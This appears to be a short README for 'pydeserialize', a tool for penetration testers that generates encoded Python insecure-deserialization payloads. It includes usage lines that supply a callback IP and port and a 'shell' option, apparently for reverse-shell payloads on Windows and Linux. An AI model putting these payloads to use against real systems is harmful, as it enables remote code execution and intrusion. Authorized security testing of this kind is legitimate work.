Features • Installation • How to use • Details • Running pydeserialize
pydeserialize is a tool that generates insecure deserialization payloads in Python. It has a feature that encodes the desired payloads, making it simple and optimized for speed.
I designed pydeserialize
to fulfill all the responsibilities for generating payloads and encodes, keeping a consistently passive model to make it useful for penetration testers.
- Generates payloads to exploit insecure deserialization vulnerabilities in python
pydeserialize -ip 192.168.4.113 -p 80 -e shell -o Windows
pydeserialize -ip 192.168.4.113 -e b64 -p 80 -o Linux
pydeserialize requires python3 and to download it just use:
pip3 install pydeserialize